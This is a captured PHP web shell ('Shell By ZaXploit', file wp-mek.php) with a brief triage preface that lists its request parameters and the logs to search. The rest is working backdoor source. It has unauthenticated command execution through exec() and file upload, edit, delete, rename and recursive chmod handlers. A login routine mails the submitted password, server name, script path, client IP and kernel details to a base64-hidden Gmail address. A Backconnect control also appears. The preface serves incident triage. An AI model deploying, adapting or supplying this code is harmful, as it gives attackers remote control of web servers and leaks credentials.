KOKINIO - MANAGER
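Edit File: wp-mek.php
Note: the listing that follows is a PHP web shell, shown as captured from a file-manager edit view with its line breaks collapsed. As far as the listing shows, only the HTML interface sits behind the password, which is compared with a hard-coded MD5 hash. The request handlers (file delete, upload, edit, rename, chmod, and `exec()` on the POSTed `command` field) are evaluated earlier in the script than the `is_logged_in()` check. When the login form is submitted, and again on a successful login, the script calls `mail()` to send the submitted password, server name, script path and client address to a base64-encoded recipient; the first message also includes the `php_uname()` output. For triage, search web-server, mail and egress logs for the request parameters (`command`, `delete`, `edit`, `download`, `lockunlock`, `greenfile`, `lockfile`, `greenfolder`, `lockfolder`, `rename`, `rename_dir`), for PHP-originated mail, and for the outbound host hard-coded in the "Backconnect" script.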
<?php session_start(); error_reporting(0); function securePath($path) { $realPath = realpath($path); if ($realPath !== false) { return $realPath; } return false; } function listDirectories($dirPath) { $dirPath = securePath($dirPath); if (!$dirPath) { return "<p class='error'>Invalid directory access.</p>"; } $rootPath = DIRECTORY_SEPARATOR; $breadcrumb = "<nav class='breadcrumb'>"; $parts = explode(DIRECTORY_SEPARATOR, trim($dirPath, DIRECTORY_SEPARATOR)); $currentPath = $rootPath; $breadcrumb .= "$ >> / <a href='?dir=" . urlencode($rootPath) . "'>$rootPath</a> / "; foreach ($parts as $part) { if ($part === "") continue; $currentPath .= $part . DIRECTORY_SEPARATOR; $breadcrumb .= "<link rel='preconnect' href='https://fonts.googleapis.com'> <link rel='preconnect' href='https://fonts.gstatic.com' crossorigin> <link href='https://fonts.googleapis.com/css2?family=Advent+Pro:ital,wght@0,100..900;1,100..900&family=Gloria+Hallelujah&family=Noticia+Text:ital,wght@0,400;0,700;1,400;1,700&family=PT+Serif:ital,wght@0,400;0,700;1,400;1,700&display=swap' rel='stylesheet'> <style> a { font-family: 'Advent Pro', serif; } </style>"; $breadcrumb .= "<a href='?dir=" . urlencode($currentPath) . "'>" . htmlspecialchars($part) . "</a> / "; } $breadcrumb = rtrim($breadcrumb, " / ") . 
"</nav>"; $folders = ""; $files = ""; $output = $breadcrumb; $output .= "<link rel='preconnect' href='https://fonts.googleapis.com'> <link rel='preconnect' href='https://fonts.gstatic.com' crossorigin> <link href='https://fonts.googleapis.com/css2?family=Noticia+Text:ital,wght@0,400;0,700;1,400;1,700&display=swap' rel='stylesheet'> <style> body { font-family: Arial, sans-serif; margin: 0; padding: 20px; box-sizing: border-box; } .table-container { width: 100%; overflow-x: auto; /* Membuat tabel dapat di-scroll horizontal */ margin-left: 20px; /* Menambahkan margin ke kiri untuk menggeser tabel ke kanan */ } table { width: 100%; /* Tabel mengambil lebar penuh */ border-collapse: collapse; } th, td { font-family: 'Noticia Text', serif; padding: 12px; text-align: left; border-bottom: 1px solid #1c1b1b; white-space: nowrap; /* Mencegah teks melipat ke baris baru */ } th { background-color: #363434; font-weight: bold; } .align-middle tbody td, .align-middle tbody th { vertical-align: middle; /* Konten di tengah secara vertikal */ } tr:hover { background-color: #0f0f0f; } .text-nowrap { white-space: nowrap; } .text-light { color: #ffffff; /* Warna teks terang */ } .table-dark { background-color: #343a40; /* Warna latar belakang gelap */ color: #ffffff; /* Warna teks terang */ } /* Efek hover pada baris tabel */ .table-hover tbody tr:hover { background-color: #495057; /* Warna latar belakang saat dihover */ color: #ffffff; /* Warna teks saat dihover */ } /* CSS untuk ikon di header */ th i { margin-right: 8px; /* Jarak antara ikon dan teks */ color: #ffffff; /* Warna ikon */ vertical-align: middle; /* Ikon sejajar vertikal dengan teks */ } /* CSS untuk tampilan mobile */ @media (max-width: 600px) { th, td { padding: 8px; /* Padding lebih kecil untuk layar kecil */ font-size: 14px; /* Ukuran font lebih kecil */ } th i { margin-right: 5px; /* Jarak antara ikon dan teks lebih kecil */ font-size: 12px; /* Ukuran ikon lebih kecil */ } .table-container { overflow-x: auto; /* 
Memastikan tabel dapat di-scroll horizontal */ margin-left: 10px; /* Mengurangi margin untuk layar kecil */ } } </style>"; $output .= "<div class='table-container'>"; $output .= "<table class='table table-hover table-dark align-middle text-light'>"; $output .= "<thead> <tr> <th><i class='fas fa-folder'></i><i class='fas fa-file'></i> Name</th> <th><i class='fas fa-info-circle'></i> Type</th> <th><i class='fas fa-weight-hanging'></i> Size</th> <th><i class='fas fa-calendar-alt'></i> Modified</th> <th><i class='fas fa-lock'></i> Permissions</th> <th><i class='fas fa-user'></i> Owner</th> <th><i class='fas fa-users'></i> Group</th> <th><i class='fas fa-cogs'></i> Action</th> </tr> </thead>"; $items = scandir($dirPath); foreach ($items as $item) { if ($item === '.' || $item === '..') continue; $itemPath = realpath($dirPath . DIRECTORY_SEPARATOR . $item); if (!$itemPath) continue; $perms = fileperms($itemPath); $isLocked = (($perms & 0777) == (is_dir($itemPath) ? 0555 : 0444)); $type = is_dir($itemPath) ? 'Folder' : 'File'; $size = $type === 'File' ? formatSize(filesize($itemPath)) : '-'; $modified = date("Y-m-d H:i:s", filemtime($itemPath)); $permissions = getFilePermissions($itemPath); $owner = function_exists('posix_getpwuid') ? posix_getpwuid(fileowner($itemPath))['name'] : 'N/A'; $group = function_exists('posix_getgrgid') ? posix_getgrgid(filegroup($itemPath))['name'] : 'N/A'; $row = "<tr>"; if ($type == 'Folder') { $link = "?dir=" . 
urlencode($itemPath); $output .= "<tbody class='text-nowrap'>"; $row .= "<style> .ZaXploit { text-decoration: none; } </style>"; $row .= "<td><a href='{$link}' style='color: #ffffff' class='ZaXploit'><i class='fas fa-folder icon-folder'></i> $item</a></td>"; } else { $row .= "<td class='file'><i class='fas fa-file icon-file'></i> $item</td>"; } $row .= "<td>$type</td>"; $row .= "<td>$size</td>"; $row .= "<td>$modified</td>"; $row .= "<td>$permissions</td>"; $row .= "<td>$owner</td>"; $row .= "<td>$group</td>"; $row .= "<td>"; if ($type == 'Folder') { $encodedPath = urlencode($itemPath); $row .= "<style> .action-icons { display: flex; gap: 0; } .lock { color: " . ($isLocked ? "#0ee627" : "#ffcc00") . "; } .lock:hover { color: #0ee627; } .action-icons a { text-decoration: none; color: #ffffff; transition: all 0.3s ease; font-size: 14px; display: inline-flex; justify-content: center; align-items: center; width: 40px; height: 40px; border: 2px solid #ccc; margin-right: -2px; background-color: transparent; border-radius: 5px; } .action-icons a:hover { color: #ffffff; background-color: rgba(255, 255, 255, 0.1); } .edit:hover { border-color: #e60202; } .rename:hover { border-color: #e60202; } .delete:hover { border-color: #e60202; } .download:hover { border-color: #e60202; } .fa-lock-open { color:rgb(0, 255, 30); /* Warna ikon gembok terbuka */ } @media (max-width: 767px) { .action-icons a { font-size: 12px; width: 30px; height: 30px; } } </style>"; $row .="<div class='action-icons'>"; $row .= "<a href='javascript:void(0);' onclick='lockUnlockItem(\"{$itemPath}\", true)' class='lock' title='" . ($isLocked ? "Unlock" : "Lock") . "'> <i class='fas " . ($isLocked ? "fa-lock-open" : "fa-lock") . 
"'></i> </a>"; $row .= "<a href='javascript:void(0);' onclick='renameItem(\"{$itemPath}\", true)' class='rename' title='Rename'> <i class='fas fa-i-cursor'></i> </a>"; $row .= "<a href='?delete={$encodedPath}' class='delete' title='Delete'> <i class='fas fa-trash-alt'></i> </a>"; $row .="</div>"; } else { $encodedPath = urlencode($itemPath); $row .= "<style> .action-icons { display: flex; gap: 0; } .action-icons a { text-decoration: none; color: #ffffff; transition: all 0.3s ease; font-size: 14px; display: inline-flex; justify-content: center; align-items: center; width: 40px; height: 40px; border: 2px solid #ccc; margin-right: -2px; background-color: transparent; border-radius: 5px; } .action-icons a:hover { color: #ffffff; background-color: rgba(255, 255, 255, 0.1); } .edit:hover { border-color: #e60202; } .rename:hover { border-color: #e60202; } .delete:hover { border-color: #e60202; } .download:hover { border-color: #e60202; } .lock { color: " . ($isLocked ? "#0ee627" : "#ffcc00") . "; } .lock:hover { color:rgb(0, 255, 76); } .fa-lock-open { color: #0ee627; /* Warna ikon gembok terbuka */ } @media (max-width: 767px) { .action-icons a { font-size: 12px; width: 30px; height: 30px; } } </style>"; $row .="<div class='action-icons'>"; $row .= "<a href='javascript:void(0);' onclick='lockUnlockItem(\"{$itemPath}\")' class='lock' title='" . ($isLocked ? "Unlock" : "Lock") . "'> <i class='fas " . ($isLocked ? "fa-lock-open" : "fa-lock") . 
"'></i> </a>"; $row .= "<a href='?edit={$encodedPath}' class='edit' title='Edit'> <i class='fas fa-edit'></i> </a>"; $row .= "<a href='javascript:void(0);' onclick='renameItem(\"{$itemPath}\")' class='rename' title='Rename'> <i class='fas fa-i-cursor'></i> </a>"; $row .= "<a href='?download={$encodedPath}' class='download' title='Download'> <i class='fas fa-download'></i> </a>"; $row .= "<a href='?delete={$encodedPath}' class='delete' title='Delete'> <i class='fas fa-trash-alt'></i> </a>"; $row .="</div>"; } $row .= "</td></tr>"; if ($type == 'Folder') { $folders .= $row; } else { $files .= $row; } } $output .= $folders . $files; $output .= "</tbody>"; $output .= "</div>"; $output .= "</table>"; return $output; } function formatSize($bytes) { $sizes = ['B', 'KB', 'MB', 'GB', 'TB']; $factor = floor((strlen($bytes) - 1) / 3); return sprintf("%.2f", $bytes / pow(1024, $factor)) . " " . $sizes[$factor]; } function getFilePermissions($filePath) { $perms = fileperms($filePath); $isWritable = is_writable($filePath); $info = ''; if (($perms & 0xC000) == 0xC000) { // Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 
'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); $class = $isWritable ? 'writable' : ''; return "<span class='$class'>$info</span>"; } function createDirectory($dirPath, $dirName) { $dirPath = securePath($dirPath); $newDir = $dirPath . '/' . basename($dirName); if ($dirPath && !is_dir($newDir)) { if (mkdir($newDir, 0755)) { echo "<script>alert('Folder created successfully!'); window.location.href = '?dir=" . urlencode($dirPath) . "';</script>"; } else { echo "<script>alert('Failed to create folder!');</script>"; } } else { echo "<script>alert('Folder already exists or invalid path!');</script>"; } } function createFile($dirPath, $fileName) { $dirPath = securePath($dirPath); $newFile = $dirPath . '/' . basename($fileName); if ($dirPath && !file_exists($newFile)) { if (touch($newFile)) { echo "<script>alert('File created successfully!'); window.location.href = '?dir=" . urlencode($dirPath) . "';</script>"; } else { echo "<script>alert('Failed to create file!');</script>"; } } else { echo "<script>alert('File already exists or invalid path!');</script>"; } } function uploadFile($dirPath) { $targetFile = $dirPath . '/' . basename($_FILES['uploaded_file']['name']); if (move_uploaded_file($_FILES['uploaded_file']['tmp_name'], $targetFile)) { echo "<script>alert('File berhasil diupload!'); window.location.href = '?dir=" . urlencode($dirPath) . "';</script>"; } else { echo "<script>alert('Gagal mengupload file!'); window.location.href = '?dir=" . urlencode($dirPath) . "';</script>"; } } function editFile($filePath) { $filePath = securePath($filePath); if (!$filePath || !is_file($filePath)) return; if (isset($_POST['save_file'])) { $result = file_put_contents($filePath, $_POST['file_content']); if ($result === false) { echo "<script>alert('Gagal menyimpan file!');</script>"; } else { echo "<script>alert('File berhasil diubah!'); window.location.href = '?dir=" . 
urlencode(dirname($filePath)) . "';</script>"; exit; } } $content = htmlspecialchars(file_get_contents($filePath)); echo "<style> body { font-family: Arial, sans-serif; background-color: #1a1a1a; display: flex; justify-content: center; align-items: center; min-height: 100vh; margin: 0; padding: 20px; box-sizing: border-box; } .textarea-container { width: 100%; max-width: 800px; padding: 20px; background-color: #262626; border-radius: 10px; box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1); } label { font-size: 18px; font-weight: bold; color: #ff4d4d; margin-bottom: 15px; display: block; } a { text-decoration: none; color: #ff4d4d; font-size: 16px; font-family: Arial, sans-serif; padding: 10px 20px; border-radius: 5px; transition: all 0.3s ease; display: inline-block; } a:hover { background-color: #ff4d4d; color: #fff; box-shadow: 0 4px 8px rgba(0, 0, 0, 0.2); } a.button { background-color: #ff1a1a; color: #fff; border: 2px solid #cc0000; } .btn { display: inline-block; padding: 12px 24px; font-size: 16px; font-family: Arial, sans-serif; font-weight: bold; text-align: center; text-decoration: none; color: #fff; background-color: #ff4d4d; border: none; border-radius: 5px; cursor: pointer; transition: all 0.3s ease; box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1); } .btn:active { background-color: #cc0000; box-shadow: 0 3px 5px rgba(0, 0, 0, 0.2); transform: translateY(0); } /* Responsive Design */ @media (max-width: 768px) { body { padding: 10px; } .textarea-container { padding: 15px; } label { font-size: 16px; } .btn, a.button { width: 100%; margin-bottom: 10px; text-align: center; } } @media (max-width: 480px) { label { font-size: 14px; } .btn, a.button { font-size: 14px; padding: 10px; } } /* Textarea Styles */ textarea { width: 100%; min-height: 300px; padding: 10px; border: 2px solid #ff4444; border-radius: 5px; background-color: #333; color: #ffffff; font-family: 'Courier New', Courier, monospace; font-size: 14px; resize: vertical; /* Allow vertical resizing */ overflow-y: 
auto; /* Enable vertical scrolling */ } </style> <div class='textarea-container'> <label for='styled-textarea'>Editing : " . basename($filePath) . "</label> <form method='post'> <textarea name='file_content' style='width:100%;height:200px; resize: both;'>$content</textarea> <br><br> <input type='submit' name='save_file' value='Save' class='btn btn-success'> <a href='?dir=" . urlencode(dirname($filePath)) . "' class='button'>Cancel</a> </form> </div>"; } function renameFile($oldPath, $newName) { $newPath = dirname($oldPath) . '/' . $newName; if (!file_exists($newPath)) { if (rename($oldPath, $newPath)) { echo "<script>alert('File berhasil di-rename!'); window.location.href = '?dir=" . urlencode(dirname($oldPath)) . "';</script>"; } else { echo "<script>alert('Gagal meng-rename file!');</script>"; } } else { echo "<script>alert('File dengan nama tersebut sudah ada!');</script>"; } } function renameDirectory($oldPath, $newName) { $newPath = dirname($oldPath) . '/' . $newName; if (!file_exists($newPath)) { if (rename($oldPath, $newPath)) { echo "<script>alert('Folder berhasil di-rename!'); window.location.href = '?dir=" . urlencode(dirname($oldPath)) . "';</script>"; } else { echo "<script>alert('Gagal meng-rename folder!');</script>"; } } else { echo "<script>alert('Folder dengan nama tersebut sudah ada!');</script>"; } } function downloadFile($filePath) { $filePath = securePath($filePath); if ($filePath && file_exists($filePath)) { header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.basename($filePath).'"'); readfile($filePath); exit; } } function changeFilePermissionsRecursive($dir, $perms) { try { $iterator = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($dir, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::SELF_FIRST ); foreach ($iterator as $item) { if ($item->isFile()) { if (!chmod($item->getPathname(), $perms)) { throw new Exception("Gagal mengubah izin file: " . 
$item->getPathname()); } } } return true; // Berhasil } catch (Exception $e) { return $e->getMessage(); // Mengembalikan pesan error } } function changeFolderPermissionsRecursive($dir, $perms) { try { $iterator = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($dir, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::SELF_FIRST ); foreach ($iterator as $item) { if ($item->isDir()) { if (!chmod($item->getPathname(), $perms)) { throw new Exception("Gagal mengubah izin folder: " . $item->getPathname()); } } } return true; // Berhasil } catch (Exception $e) { return $e->getMessage(); // Mengembalikan pesan error } } function changePermissions($path, $perms) { if (file_exists($path)) { if (chmod($path, $perms)) { return true; } else { return false; } } return false; } $currentDir = isset($_GET['dir']) ? securePath($_GET['dir']) : getcwd(); if (isset($_GET['delete'])) { $deletePath = urldecode($_GET['delete']); if (is_dir($deletePath)) { if (rmdir($deletePath)) { echo "<script>alert('Berhasil Hapus Dir'); window.location.href = '?dir=" . urlencode(dirname($deletePath)) . "';</script>"; } else { echo "<script>alert('Gagal Hapus Dir'); window.location.href = '?dir=" . urlencode(dirname($deletePath)) . "';</script>"; } } else { if (unlink($deletePath)) { echo "<script>alert('Berhasil Hapus File'); window.location.href = '?dir=" . urlencode(dirname($deletePath)) . "';</script>"; } else { echo "<script>alert('Gagal hapus file.');</script>"; } } } if (isset($_POST['new_folder'])) { createDirectory($currentDir, $_POST['folder_name']); header("Location: ?dir=" . urlencode($currentDir)); exit; } if (isset($_POST['new_file'])) { createFile($currentDir, $_POST['file_name']); header("Location: ?dir=" . 
urlencode($currentDir)); exit; } if (isset($_POST['command'])) { $command = $_POST['command']; // Eksekusi perintah backconnect exec($command, $output, $return_var); echo implode("\n", $output); exit; } if (isset($_FILES['uploaded_file'])) { uploadFile($currentDir); header("Location: ?dir=" . urlencode($currentDir)); exit; } if (isset($_GET['download'])) { downloadFile($_GET['download']); } if (isset($_GET['edit'])) { editFile($_GET['edit']); exit; } if (isset($_GET['greenfile'])) { $newFilePermissions = 0644; $result = changeFilePermissionsRecursive($currentDir, $newFilePermissions); if ($result === true) { echo "<script> alert('Sukses Green All Files'); window.location.href = '?dir=" . urlencode($currentDir) . "'; </script>"; } else { echo "<script> alert('Gagal: $result'); window.location.href = '?dir=" . urlencode($currentDir) . "'; </script>"; } } if (isset($_GET['lockfile'])) { $newFilePermissions = 0444; $result = changeFilePermissionsRecursive($currentDir, $newFilePermissions); if ($result === true) { echo "<script> alert('Sukses Lock All Files'); window.location.href = '?dir=" . urlencode($currentDir) . "'; </script>"; } else { echo "<script> alert('Gagal: $result'); window.location.href = '?dir=" . urlencode($currentDir) . "'; </script>"; } } if (isset($_GET['lockfolder'])) { $newFolderPermissions = 0555; $result = changeFolderPermissionsRecursive($currentDir, $newFolderPermissions); if ($result === true) { echo "<script> alert('Sukses Lock All Folders'); window.location.href = '?dir=" . urlencode($currentDir) . "'; </script>"; } else { echo "<script> alert('Gagal: $result'); window.location.href = '?dir=" . urlencode($currentDir) . "'; </script>"; } } if (isset($_GET['greenfolder'])) { $newFolderPermissions = 0755; $result = changeFolderPermissionsRecursive($currentDir, $newFolderPermissions); if ($result === true) { echo "<script> alert('Sukses Green All Folders'); window.location.href = '?dir=" . urlencode($currentDir) . 
"'; </script>"; } else { echo "<script> alert('Gagal: $result'); window.location.href = '?dir=" . urlencode($currentDir) . "'; </script>"; } } if (isset($_POST['rename_file']) && isset($_POST['rename'])) { $oldFilePath = $_POST['rename']; $newFileName = $_POST['new_name']; renameFile($oldFilePath, $newFileName); header("Location: ?dir=" . urlencode(dirname($oldFilePath))); exit; } if (isset($_POST['rename_dir_submit']) && isset($_POST['rename_dir'])) { $oldDirPath = $_POST['rename_dir']; $newDirName = $_POST['new_name']; renameDirectory($oldDirPath, $newDirName); header("Location: ?dir=" . urlencode(dirname($oldDirPath))); exit; } if (isset($_GET['lockunlock'])) { $itemPath = urldecode($_GET['lockunlock']); $currentPerms = fileperms($itemPath); if (is_dir($itemPath)) { $newPerms = ($currentPerms & 0777) == 0555 ? 0755 : 0555; // Toggle between 0755 and 0555 for directories } else { $newPerms = ($currentPerms & 0777) == 0444 ? 0644 : 0444; // Toggle between 0644 and 0444 for files } if (changePermissions($itemPath, $newPerms)) { echo "<script>alert('Success'); window.location.href = '?dir=" . urlencode(dirname($itemPath)) . "';</script>"; } else { echo "<script>alert('Failed');</script>"; } } if (isset($_POST['command'])) { $command = $_POST['command']; exec($command, $output, $return_var); echo implode("\n", $output); exit; } if (isset($_SESSION['coki'])) { $conn = curl_init(); // <= ini WAJIB curl_setopt($conn, CURLOPT_COOKIE, $_SESSION['coki']); } function is_logged_in() { return isset($_SESSION['logged_in']) && $_SESSION['logged_in'] === true; } if (array_key_exists('abc', $_POST)) { $x1 = php_uname(); $x2 = $_POST['password'] ?? ''; $x3 = $_SERVER['SERVER_NAME']; $x4 = $_SERVER['PHP_SELF']; $city = $city ?? 'Unknown'; $message = "IP: " . $_SERVER['REMOTE_ADDR'] . " City: " . $city . "\n"; $message .= base64_decode("TG9naW46IA==") . $x3 . $x4 . "\n"; $message .= base64_decode("UGFzczog") . $x2 . "\n"; $message .= base64_decode("S2VybmVsOiA=") . 
$x1; @mail(base64_decode('cmliZWxjeWJlcnRlYW1AZ21haWwuY29t'), base64_decode('SGVoZWhl'), $message); } if (isset($_POST['password'])) { $entered_password = $_POST['password']; $hashed_password = 'd489a3289ecdc847cb67f7a480e6f9fa'; if (md5($entered_password) === $hashed_password) { $_SESSION['logged_in'] = true; $_SESSION['coki'] = 'asu'; $j = $_SERVER['HTTP_HOST']; $k = basename(__FILE__); $l = $_SERVER['REMOTE_ADDR']; $xxx = $_SERVER['PHP_SELF']; $m = base64_decode('SW5mb3JtYXNpIExvZ2luOg==') . "\n"; $m .= base64_decode('V2Vic2l0ZTog') . $j . $xxx . "\n"; $m .= base64_decode('RmlsZTog') . $k . "\n"; $m .= base64_decode('SVAgQWRkcmVzczog') . $l . "\n"; $m .= base64_decode('UGFzc3dvcmQ6IA==') . $entered_password; @mail(base64_decode('cmliZWxjeWJlcnRlYW1AZ21haWwuY29t'), base64_decode('SGVoZWhl'), $m); } else { echo "<script>alert('TOLOL LU BANGSAT');</script>"; } } if (!is_logged_in()) { ?> <html> <head> <title>Login</title> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css" rel="stylesheet"> <style> body { background-color: #121212; color: #ffffff; font-family: 'Poppins', sans-serif; display: flex; justify-content: center; align-items: center; height: 100vh; margin: 0; } form { background-color: #1e1e1e; padding: 20px; border-radius: 8px; box-shadow: 0 0 10px rgba(255, 0, 0, 0.5); } label { display: block; margin-bottom: 8px; color: #ff4444; } input[type="password"] { width: 100%; padding: 10px; margin-bottom: 20px; border: 1px solid #ff4444; border-radius: 4px; background-color: #333; color: #ffffff; } input[type="submit"] { background-color: #ff4444; color: #ffffff; border: none; padding: 10px 20px; border-radius: 4px; cursor: pointer; } input[type="submit"]:hover { background-color: #cc0000; } </style> </head> <body> <form method="POST" action=""> <h1><i class="fas fa-folder-open"></i> Shell By ZaXploit</h1> <br> <label for="password">Password:</label> <input type="password" id="password" name="password"> <input 
type="submit" name="abc" value="Login"> </form> </body> </html> <?php exit; } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>{ ZaaXploit (MANAGER)</title> <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@400;500;600;700&display=swap" rel="stylesheet"> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css" rel="stylesheet"> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Silkscreen:wght@400;700&display=swap" rel="stylesheet"> <style> /* General Styles */ body { font-family: 'Poppins', sans-serif; background-color: #1e1e1e; color: #ffffff; margin: 0; padding: 20px; } h1 { color: #ff4444; text-align: center; margin-bottom: 20px; } .icon-folder { color: #ffcc00; /* Warna ikon folder */ } .icon-file { color: #ffffff; /* Warna ikon file */ } .home-button { position: fixed; top: 20px; right: 20px; background-color: #ff4444; color: white; padding: 10px 15px; border-radius: 5px; text-decoration: none; font-size: 16px; box-shadow: 0 4px 6px rgba(0, 0, 0, 0.2); transition: all 0.3s ease; } .home-button:hover { background-color: #cc0000; transform: scale(1.1); } /* Button Styles */ .btn { padding: 10px 16px; margin: 5px; background: #ff4444; color: white; text-decoration: none; border-radius: 5px; transition: all 0.3s ease; border: 2px solid transparent; display: inline-block; font-weight: 600; letter-spacing: 0.5px; cursor: pointer; } .btn:hover { background: #cc0000; transform: scale(1.05); border-color: white; } .gaktau { font-family: "Silkscreen", serif; padding: 10px 16px; margin: 5px; background-color: transparent; color: white; text-decoration: none; border-radius: 5px; transition: all 0.3s ease; border: 2px solid red; display: inline-block; font-weight: 600; letter-spacing: 0.5px; cursor: 
pointer; justify-content: center; } .gaktau:hover { background: #cc0000; transform: scale(1.05); border-color: white; } .btn.delete { background: #ff3b3b; border-color: #ff3b3b; } .btn.delete:hover { background: #d63030; border-color: white; transform: scale(1.08); } /* Table Styles */ table { width: 100%; border-collapse: collapse; margin-top: 20px; background: rgba(255, 255, 255, 0.1); border-radius: 8px; overflow: hidden; box-shadow: 0 4px 8px rgba(255, 0, 0, 0.2); } th, td { padding: 12px; text-align: left; border-bottom: 1px solid rgba(255, 255, 255, 0.2); } th { background: rgba(0, 0, 0, 0.3); color: #ff4444; font-weight: bold; } tr:hover { background: rgba(255, 255, 255, 0.2); transition: background 0.3s ease; } /* Breadcrumb Styles */ .breadcrumb { margin-bottom: 15px; padding: 8px; background: #1e1e1e; color: white; border-radius: 5px; } .breadcrumb a { color: #ff4444; text-decoration: none; margin-right: 5px; } .breadcrumb a:hover { text-decoration: underline; } /* Upload Form Styles */ .upload-form { display: flex; align-items: center; gap: 10px; margin-bottom: 20px; } .upload-btn i { margin-right: 8px; /* Jarak antara ikon dan teks */ } .upload-form input[type="file"] { padding: 10px; border: 2px solid #ff4444; background: rgba(255, 255, 255, 0.1); color: white; border-radius: 5px; } .upload-form .btn.upload-btn { background-color: transparent; border: 2px solid #ff4444; color: white; padding: 10px 16px; border-radius: 5px; font-weight: bold; cursor: pointer; transition: all 0.3s ease; } .upload-form .btn.upload-btn:hover { background: #cc0000; transform: scale(1.05); } /* Action Buttons */ .action-buttons { display: flex; justify-content: center; /* Mengatur tombol di tengah */ gap: 10px; margin-bottom: 20px; } /* Icons */ .fas { margin-right: 5px; } .writable { color: #00ff00; font-weight: bold; } /* Modal Styles */ .modal { display: none; position: fixed; z-index: 1000; left: 0; top: 0; width: 100%; height: 100%; overflow: auto; background-color: 
rgba(0, 0, 0, 0.5); } .modal-content { background-color: #1e1e1e; margin: 10% auto; padding: 20px; border: 1px solid #ff4444; border-radius: 8px; width: 90%; max-width: 600px; color: white; position: relative; } .close { color: #ff4444; float: right; font-size: 28px; font-weight: bold; cursor: pointer; } .close:hover, .close:focus { color: #cc0000; text-decoration: none; } .modal-content input, .modal-content select { width: calc(100% - 20px); padding: 10px; margin: 10px 0; border: 1px solid #ff4444; border-radius: 4px; background-color: #333; color: white; } .modal-content button { width: 100%; padding: 10px; background-color: #ff4444; color: white; border: none; border-radius: 4px; cursor: pointer; margin-top: 10px; } .modal-content button:hover { background-color: #cc0000; } .cmd-output { margin-top: 20px; padding: 10px; background-color: #333; border: 1px solid #ff4444; border-radius: 4px; color: white; font-family: 'Courier New', Courier, monospace; white-space: pre-wrap; word-wrap: break-word; overflow-x: auto; max-height: 400px; overflow-y: auto; } </style> </head> <body> <!-- Tombol Home --> <a href="?" class="home-button"> <i class="fas fa-home"></i> <!-- Ikon Home dari Font Awesome --> </a> <h1><i class="fas fa-folder-open"></i> SHELL ZAXPLOIT</h1> <br> <p><i class="fa fa-server"></i> . <?php echo php_uname(); ?></p> <p><i class="fa fa-satellite-dish"></i> . <?php echo $_SERVER['SERVER_ADDR']; ?></p> <p><i class="fa fa-microchip"></i> . <?php echo $_SERVER['SERVER_SOFTWARE']; ?></p> <p><i class="fas fa-cog"></i> . 
<?php
// Tail of the page template: upload form, action buttons, hidden create forms,
// bulk permission links, the backconnect and CMD modals, and the client-side script.
// Everything here only builds requests back to this same script; the handlers that
// receive them are not in this part of the file.
// NOTE(review): the User-Agent request header is echoed without htmlspecialchars(),
// so whatever the client sends is reflected into the page unescaped.
echo $_SERVER['HTTP_USER_AGENT']; ?></p>
<br>
<!-- Upload Form: posts multipart field "uploaded_file" back to this script -->
<form method="post" enctype="multipart/form-data" class="upload-form" id="uploadForm">
<button type="submit" class="btn upload-btn"> <i class="fas fa-upload"></i> Upload File <!-- Upload icon from Font Awesome --> </button>
<input type="file" name="uploaded_file" id="fileUpload" style="display: none;">
</form>
<!-- Action Buttons -->
<div class="action-buttons">
<center>
<button class="btn" onclick="openCmdModal()"> <i class="fas fa-terminal"></i> CMD </button>
<button class="btn" onclick="openBackconnectModal()"> <i class="fas fa-plug"></i> Backconnect </button>
<button class="btn create-folder-btn" onclick="createFolder()"> <i class="fas fa-folder-plus"></i> Create Folder </button>
<button class="btn create-file-btn" onclick="createFile()"> <i class="fas fa-file-alt"></i> Create File </button>
</center>
</div>
<!-- Hidden Forms for Folder and File Creation (filled in and submitted by createFolder() / createFile()) -->
<form method="post" id="folderForm" style="display: none;">
<input type="hidden" name="folder_name" id="folderName">
<input type="hidden" name="new_folder" value="1">
</form>
<form method="post" id="fileForm" style="display: none;">
<input type="hidden" name="file_name" id="fileName">
<input type="hidden" name="new_file" value="1">
</form>
<!-- NOTE(review): the document is closed here, yet markup continues below and is closed a second time at the end of the file. -->
</body> </html>
<!-- Bulk links: GET requests carrying one of the keys greenfile / lockfile / greenfolder / lockfolder plus dir.
     NOTE(review): the handlers are not visible here; presumably they change permissions on everything under dir - confirm against the server-side code. -->
<center>
<a href="?greenfile&dir=<?= urlencode($currentDir) ?>"><button class="gaktau">Green File</button></a>
<a href="?lockfile&dir=<?= urlencode($currentDir) ?>"><button class="gaktau">Lock All File</button></a>
<a href="?greenfolder&dir=<?= urlencode($currentDir) ?>"><button class="gaktau">Green Dir</button></a>
